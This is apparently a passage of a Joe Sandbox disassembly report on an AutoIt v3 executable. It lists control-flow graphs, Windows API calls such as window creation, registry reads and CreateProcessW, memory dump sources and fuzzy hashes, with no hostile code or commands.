                                                                                                                                        control_flow_graph 880 b8dbbe-b8dbda lstrlenW 881 b8dbdc-b8dbe6 GetFileAttributesW 880->881 882 b8dc06 880->882 883 b8dbe8-b8dbf7 FindFirstFileW 881->883 884 b8dc09-b8dc0d 881->884 882->884 883->882 885 b8dbf9-b8dc04 FindClose 883->885 885->884
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00B65222), ref: 00B8DBCE
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B8DBDD
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B8DBEE
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B8DBFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                        • Opcode ID: b0645a312fcffaedc062977250cdf261cb32831ea7ac0f9f4b59d4a38832a155
                                                                                                                                        • Instruction ID: 3bdf8d69f8f5a24fce399293f651ad32dfc9ddba48194d80a5fb8f10024540ce
                                                                                                                                        • Opcode Fuzzy Hash: b0645a312fcffaedc062977250cdf261cb32831ea7ac0f9f4b59d4a38832a155
                                                                                                                                        • Instruction Fuzzy Hash: ACF039318149146B8220BF7CAD0D8AA7BACDE42335B544B47F876D21F0EFF09D95CA96

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 baaff9-bab056 call b42340 3 bab058-bab06b call b2b567 0->3 4 bab094-bab098 0->4 14 bab0c8 3->14 15 bab06d-bab092 call b2b567 * 2 3->15 6 bab09a-bab0bb call b2b567 * 2 4->6 7 bab0dd-bab0e0 4->7 29 bab0bf-bab0c4 6->29 10 bab0e2-bab0e5 7->10 11 bab0f5-bab119 call b27510 call b27620 7->11 16 bab0e8-bab0ed call b2b567 10->16 31 bab1d8-bab1e0 11->31 32 bab11f-bab178 call b27510 call b27620 call b27510 call b27620 call b27510 call b27620 11->32 19 bab0cb-bab0cf 14->19 15->29 16->11 24 bab0d9-bab0db 19->24 25 bab0d1-bab0d7 19->25 24->7 24->11 25->16 29->7 33 bab0c6 29->33 36 bab20a-bab238 GetCurrentDirectoryW call b3fe0b GetCurrentDirectoryW 31->36 37 bab1e2-bab1fd call b27510 call b27620 31->37 79 bab17a-bab195 call b27510 call b27620 32->79 80 bab1a6-bab1d6 GetSystemDirectoryW call b3fe0b GetSystemDirectoryW 32->80 33->19 46 bab23c 36->46 37->36 50 bab1ff-bab208 call b44963 37->50 49 bab240-bab244 46->49 52 bab246-bab270 call b29c6e * 3 49->52 53 bab275-bab285 call b900d9 49->53 50->36 50->53 52->53 62 bab28b-bab2e1 call b907c0 call b906e6 call b905a7 53->62 63 bab287-bab289 53->63 66 bab2ee-bab2f2 62->66 99 bab2e3 62->99 63->66 71 bab39a-bab3be CreateProcessW 66->71 72 bab2f8-bab321 call b811c8 66->72 77 bab3c1-bab3d4 call b3fe14 * 2 71->77 84 bab32a call b814ce 72->84 85 bab323-bab328 call b81201 72->85 103 bab42f-bab43d CloseHandle 77->103 104 bab3d6-bab3e8 77->104 79->80 105 bab197-bab1a0 call b44963 79->105 80->46 98 bab32f-bab33c call b44963 84->98 85->98 115 bab33e-bab345 98->115 116 bab347-bab357 call b44963 98->116 99->66 107 bab43f-bab444 103->107 108 bab49c 103->108 109 bab3ea 104->109 110 bab3ed-bab3fc 104->110 105->49 105->80 117 bab451-bab456 107->117 118 bab446-bab44c CloseHandle 107->118 113 bab4a0-bab4a4 108->113 109->110 111 bab3fe 110->111 112 bab401-bab42a GetLastError call b2630c call b2cfa0 110->112 111->112 127 bab4e5-bab4f6 call b90175 112->127 120 bab4b2-bab4bc 113->120 121 bab4a6-bab4b0 113->121 115->115 115->116 136 bab359-bab360 116->136 137 bab362-bab372 call b44963 116->137 124 bab458-bab45e CloseHandle 117->124 125 bab463-bab468 117->125 118->117 128 bab4be 120->128 129 bab4c4-bab4e3 call b2cfa0 CloseHandle 120->129 121->127 124->125 131 bab46a-bab470 CloseHandle 125->131 132 bab475-bab49a call b909d9 call bab536 125->132 128->129 129->127 131->132 132->113 136->136 136->137 146 bab37d-bab398 call b3fe14 * 3 137->146 147 bab374-bab37b 137->147 146->77 147->146 147->147
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAB198
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAB1B0
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAB1D4
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAB200
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAB214
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAB236
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAB332
                                                                                                                                          • Part of subcall function 00B905A7: GetStdHandle.KERNEL32(000000F6), ref: 00B905C6
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAB34B
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAB366
                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BAB3B6
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00BAB407
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BAB439
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAB44A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAB45C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAB46E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BAB4E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                        • Opcode ID: 3ca2fba30205e4c2186952c9a0433a306d7af4dcf62e13e175d986dc2594aa5f
                                                                                                                                        • Instruction ID: 8d0e88729060db830d8127b7e98230370b0ad5e9326035d027d355414af63417
                                                                                                                                        • Opcode Fuzzy Hash: 3ca2fba30205e4c2186952c9a0433a306d7af4dcf62e13e175d986dc2594aa5f
                                                                                                                                        • Instruction Fuzzy Hash: ECF169315083509FCB24EF24D891F6ABBE5EF86314F14859DF8999B2A2CB31EC44CB52
                                                                                                                                        APIs
                                                                                                                                        • GetInputState.USER32 ref: 00B2D807
                                                                                                                                        • timeGetTime.WINMM ref: 00B2DA07
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B2DB28
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00B2DB7B
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B2DB89
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B2DB9F
                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 00B2DBB1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2189390790-0
                                                                                                                                        • Opcode ID: 1505d86b13b0ec5e4134ffdfdf6007e196c978b177a585a09b6091af1ea19d40
                                                                                                                                        • Instruction ID: 2691a589a7df3ca765270035e917e9ef041b3da8816b50fdcd750b3f202032c5
                                                                                                                                        • Opcode Fuzzy Hash: 1505d86b13b0ec5e4134ffdfdf6007e196c978b177a585a09b6091af1ea19d40
                                                                                                                                        • Instruction Fuzzy Hash: 6942F430604251DFD725CF28D894BAAB7E1FF55304F148AA9F5AD8B391DB70E884CB92

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B22D07
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00B22D31
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B22D42
                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00B22D5F
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B22D6F
                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00B22D85
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B22D94
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                        • Opcode ID: 1ee7137c630c082afac207f4f5305512498dec04f0c13fb54c28c79183e37824
                                                                                                                                        • Instruction ID: 9690fa89580cd250f0d6c0ed43750d36caf6d4c8c3a3d36ebc1c8cda97900422
                                                                                                                                        • Opcode Fuzzy Hash: 1ee7137c630c082afac207f4f5305512498dec04f0c13fb54c28c79183e37824
                                                                                                                                        • Instruction Fuzzy Hash: D721A2B5911218EBDB00DFA9E849AADBFB8FB08700F108A1AE551A72A0DBF14545CF95

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 457 b6065b-b6068b call b6042f 460 b606a6-b606b2 call b55221 457->460 461 b6068d-b60698 call b4f2c6 457->461 466 b606b4-b606c9 call b4f2c6 call b4f2d9 460->466 467 b606cb-b60714 call b6039a 460->467 468 b6069a-b606a1 call b4f2d9 461->468 466->468 477 b60716-b6071f 467->477 478 b60781-b6078a GetFileType 467->478 475 b6097d-b60983 468->475 482 b60756-b6077c GetLastError call b4f2a3 477->482 483 b60721-b60725 477->483 479 b607d3-b607d6 478->479 480 b6078c-b607bd GetLastError call b4f2a3 CloseHandle 478->480 486 b607df-b607e5 479->486 487 b607d8-b607dd 479->487 480->468 496 b607c3-b607ce call b4f2d9 480->496 482->468 483->482 488 b60727-b60754 call b6039a 483->488 491 b607e9-b60837 call b5516a 486->491 492 b607e7 486->492 487->491 488->478 488->482 499 b60847-b6086b call b6014d 491->499 500 b60839-b60845 call b605ab 491->500 492->491 496->468 507 b6087e-b608c1 499->507 508 b6086d 499->508 500->499 506 b6086f-b60879 call b586ae 500->506 506->475 510 b608e2-b608f0 507->510 511 b608c3-b608c7 507->511 508->506 512 b608f6-b608fa 510->512 513 b6097b 510->513 511->510 515 b608c9-b608dd 511->515 512->513 516 b608fc-b6092f CloseHandle call b6039a 512->516 513->475 515->510 519 b60963-b60977 516->519 520 b60931-b6095d GetLastError call b4f2a3 call b55333 516->520 519->513 520->519
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B6039A: CreateFileW.KERNELBASE(00000000,00000000,?,00B60704,?,?,00000000,?,00B60704,00000000,0000000C), ref: 00B603B7
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B6076F
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00B60776
                                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00B60782
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B6078C
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00B60795
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B607B5
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B608FF
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B60931
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00B60938
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                        • Opcode ID: bae19f4e878ddfb39c1208fa7de0d6515a43778c785fb67a78f9f6291b2e9529
                                                                                                                                        • Instruction ID: 41e370cc52f967ea6f2f18e6cb743606a7f1e34b726e80b724e12578fc5da720
                                                                                                                                        • Opcode Fuzzy Hash: bae19f4e878ddfb39c1208fa7de0d6515a43778c785fb67a78f9f6291b2e9529
                                                                                                                                        • Instruction Fuzzy Hash: 5DA10532A241058FDF19EF68D891BBE7BE0EB46320F140199F8159B2A2DB759D12CB91

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BF1418,?,00B22E7F,?,?,?,00000000), ref: 00B23A78
                                                                                                                                          • Part of subcall function 00B23357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B23379
                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B2356A
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B6318D
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B631CE
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B63210
                                                                                                                                        • _wcslen.LIBCMT ref: 00B63277
                                                                                                                                        • _wcslen.LIBCMT ref: 00B63286
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                        • API String ID: 98802146-2727554177
                                                                                                                                        • Opcode ID: 4ee7a6f06d7f4ba4b73eb55b19c9c425efce635536434aafc6b0e980e7345407
                                                                                                                                        • Instruction ID: ec765657c161b1ffaf8f9e64fd91356d3e0e7ba54cbb440c609eab6f742458ad
                                                                                                                                        • Opcode Fuzzy Hash: 4ee7a6f06d7f4ba4b73eb55b19c9c425efce635536434aafc6b0e980e7345407
                                                                                                                                        • Instruction Fuzzy Hash: C071A1B14043159FC314EF29EC829BBBBE8FF99740F40096EF54997160EB749A48CB65

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B22B8E
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B22B9D
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00B22BB3
                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00B22BC5
                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00B22BD7
                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B22BEF
                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00B22C40
                                                                                                                                          • Part of subcall function 00B22CD4: GetSysColorBrush.USER32(0000000F), ref: 00B22D07
                                                                                                                                          • Part of subcall function 00B22CD4: RegisterClassExW.USER32(00000030), ref: 00B22D31
                                                                                                                                          • Part of subcall function 00B22CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B22D42
                                                                                                                                          • Part of subcall function 00B22CD4: InitCommonControlsEx.COMCTL32(?), ref: 00B22D5F
                                                                                                                                          • Part of subcall function 00B22CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B22D6F
                                                                                                                                          • Part of subcall function 00B22CD4: LoadIconW.USER32(000000A9), ref: 00B22D85
                                                                                                                                          • Part of subcall function 00B22CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B22D94
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                        • Opcode ID: 51ab8a8506b41db0a11a3d91b2396d941b71fcfd088bf4bb6b3543c39386d483
                                                                                                                                        • Instruction ID: 4ab151ca37f987032fe3a98843fba077710e3e60986611f132466c50965b9fd9
                                                                                                                                        • Opcode Fuzzy Hash: 51ab8a8506b41db0a11a3d91b2396d941b71fcfd088bf4bb6b3543c39386d483
                                                                                                                                        • Instruction Fuzzy Hash: 67212C71E00315FBDB10DFAAEC55AA97FB4FB48B50F00095AF504A76A0DBB10944CF98

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 598 b23170-b23185 599 b23187-b2318a 598->599 600 b231e5-b231e7 598->600 601 b231eb 599->601 602 b2318c-b23193 599->602 600->599 603 b231e9 600->603 607 b231f1-b231f6 601->607 608 b62dfb-b62e23 call b218e2 call b3e499 601->608 604 b23265-b2326d PostQuitMessage 602->604 605 b23199-b2319e 602->605 606 b231d0-b231d8 DefWindowProcW 603->606 613 b23219-b2321b 604->613 610 b231a4-b231a8 605->610 611 b62e7c-b62e90 call b8bf30 605->611 612 b231de-b231e4 606->612 614 b231f8-b231fb 607->614 615 b2321d-b23244 SetTimer RegisterWindowMessageW 607->615 642 b62e28-b62e2f 608->642 617 b231ae-b231b3 610->617 618 b62e68-b62e72 call b8c161 610->618 611->613 635 b62e96 611->635 613->612 621 b23201-b23214 KillTimer call b230f2 call b23c50 614->621 622 b62d9c-b62d9f 614->622 615->613 619 b23246-b23251 CreatePopupMenu 615->619 625 b62e4d-b62e54 617->625 626 b231b9-b231be 617->626 631 b62e77 618->631 619->613 621->613 628 b62dd7-b62df6 MoveWindow 622->628 629 b62da1-b62da5 622->629 625->606 638 b62e5a-b62e63 call b80ad7 625->638 633 b23253-b23263 call b2326f 626->633 634 b231c4-b231ca 626->634 628->613 636 b62dc6-b62dd2 SetFocus 629->636 637 b62da7-b62daa 629->637 631->613 633->613 634->606 634->642 635->606 636->613 637->634 643 b62db0-b62dc1 call b218e2 637->643 638->606 642->606 646 b62e35-b62e48 call b230f2 call b23837 642->646 643->613 646->606
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B2316A,?,?), ref: 00B231D8
                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00B2316A,?,?), ref: 00B23204
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B23227
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B2316A,?,?), ref: 00B23232
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00B23246
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00B23267
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                        • Opcode ID: 70a2ce390849488dc65c6d148fd6c1074b99ae1faa275b6bcd488a7dc7612ba2
                                                                                                                                        • Instruction ID: 94ebc7e918bd613d5a6294a86a318e35c86447573e17d168697f798c57157c0b
                                                                                                                                        • Opcode Fuzzy Hash: 70a2ce390849488dc65c6d148fd6c1074b99ae1faa275b6bcd488a7dc7612ba2
                                                                                                                                        • Instruction Fuzzy Hash: 8D410631200228EBDB145F7CAD49B793AE9E705B40F0449E5F549A72A2CFBACE41D7A1

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 664 b22c63-b22cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B22C91
                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B22CB2
                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00B21CAD,?), ref: 00B22CC6
                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00B21CAD,?), ref: 00B22CCF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                        • Opcode ID: 571ea84c7d4fd6432fa7b8876f646a11c42585254bbb253227dd3a7e615915e4
                                                                                                                                        • Instruction ID: fc048d14bc63d322a78ca033f951289c196afc9056dd694b1e0a62e4f679dce3
                                                                                                                                        • Opcode Fuzzy Hash: 571ea84c7d4fd6432fa7b8876f646a11c42585254bbb253227dd3a7e615915e4
                                                                                                                                        • Instruction Fuzzy Hash: D5F0DA76540290BBEB315B1BAC08EB72EBDD7C7F60B00085AF904A75A0CAA11850DAB8

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 815 b23b1c-b23b27 816 b23b99-b23b9b 815->816 817 b23b29-b23b2e 815->817 818 b23b8c-b23b8f 816->818 817->816 819 b23b30-b23b48 RegOpenKeyExW 817->819 819->816 820 b23b4a-b23b69 RegQueryValueExW 819->820 821 b23b80-b23b8b RegCloseKey 820->821 822 b23b6b-b23b76 820->822 821->818 823 b23b90-b23b97 822->823 824 b23b78-b23b7a 822->824 825 b23b7e 823->825 824->825 825->821
                                                                                                                                        APIs
